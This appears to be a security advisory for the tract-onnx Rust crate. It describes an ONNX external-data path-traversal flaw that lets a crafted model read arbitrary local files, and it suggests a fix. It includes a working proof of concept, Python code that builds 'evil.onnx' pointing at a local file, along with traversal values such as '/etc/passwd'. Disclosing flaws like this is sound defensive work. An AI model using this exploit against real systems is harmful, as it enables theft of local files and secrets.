Summary "tract" (the "tract-onnx" crate) resolves an ONNX tensor's external-data "location" by joining it onto the model directory without any sanitization. Because "location" comes from the (untrusted) ".onnx" file, a malicious model can make "tract" open and read an arbitrary local file at load time, with the file's contents flowing into the model's tensors / inference output (read-only file disclosure). This is the ONNX external-data path-traversal class that the reference "onnx" library hardened over several CVEs; "tract" resolves "location" itself and was never hardened. Details In "onnx/src/tensor.rs", "get_external_resources()" builds the path with no checks: let location = /* tensor.external_data "location" value — attacker-controlled */; let p = PathBuf::from(path).join(location); // no is_absolute / ".." / canonicalize / containment check provider.read_bytes_from_path(&mut tensor_data, &p, offset, length)?; // Mmap::map(File::open(p)) by default - "Path::join" with an absolute "location" (e.g. "/etc/passwd") discards the base directory → "p = /etc/passwd". - A relative "../../../../etc/passwd" value is not normalized → directory traversal. - The default "MmapDataResolver" ("onnx/src/data_resolver.rs") then "mmap"s the file and copies "mmap[offset..offset+length]" into the tensor. "offset"/"length" are also taken from the file; an out-of-range slice panics (DoS). No "is_absolute", "..", "canonicalize", or containment check exists anywhere on this path ("tensor.rs", "model.rs", "data_resolver.rs"). Reachable from the standard public API: "model_for_path(p)" ("onnx/src/model.rs") sets "model_dir = p.parent()" and calls "load_tensor(proto, model_dir)" → "get_external_resources(.., model_dir)". PoC Tested on "tract-onnx 0.21.16" (crates.io), Rust 1.96. 1. A canary file the model must not be able to read: "/tmp/tract_canary_secret.txt" → "TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b" 2. Build a small "evil.onnx" with a "UINT8[37]" initializer whose "external_data" is "location=/tmp/tract_canary_secret.txt" (absolute), "offset=0", "length=37", fed through "Identity" to the output (raw protobuf serialization): import onnx from onnx import helper, TensorProto, StringStringEntryProto N = 37; LOC = "/tmp/tract_canary_secret.txt" # absolute -> Path::join discards the base dir w = TensorProto(); w.name = "W"; w.data_type = TensorProto.UINT8 w.dims.extend([N]); w.data_location = TensorProto.EXTERNAL for k, v in [("location", LOC), ("offset", "0"), ("length", str(N))]: e = StringStringEntryProto(); e.key = k; e.value = v; w.external_data.append(e) node = helper.make_node("Identity", ["W"], ["Y"]) out = helper.make_tensor_value_info("Y", TensorProto.UINT8, [N]) g = helper.make_graph([node], "g", [], [out], initializer=[w]) m = helper.make_model(g, opset_imports=[helper.make_opsetid("", 13)]) open("evil.onnx", "wb").write(m.SerializeToString()) 3. Victim loads the untrusted model with the standard API: let model = tract_onnx::onnx().model_for_path("evil.onnx")?; let out = model.into_optimized()?.into_runnable()?.run(tvec!())?; let bytes: Vec<u8> = out[0].to_array_view::<u8>()?.iter().cloned().collect(); println!("{:?}", String::from_utf8_lossy(&bytes)); Output: "TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b" i.e. the contents of the arbitrary local file were read by "tract" and surfaced in the inference output. Impact Read-only arbitrary local file disclosure when an application uses "tract" to load an untrusted or shared ONNX model (model hubs, multi-file repos, user uploads). The file content is recoverable from the model's tensors / inference output. Secondary: denial of service (panic) via out-of-bounds "offset"/"length". No write or code execution. Suggested fix Reject absolute "location" and any ".." component, then canonicalize and verify the resolved path stays within the model directory (mirroring "onnx" 1.22.0's "resolve_external_data_location"); reject symlinks; validate "offset"/"length" against the file size before slicing.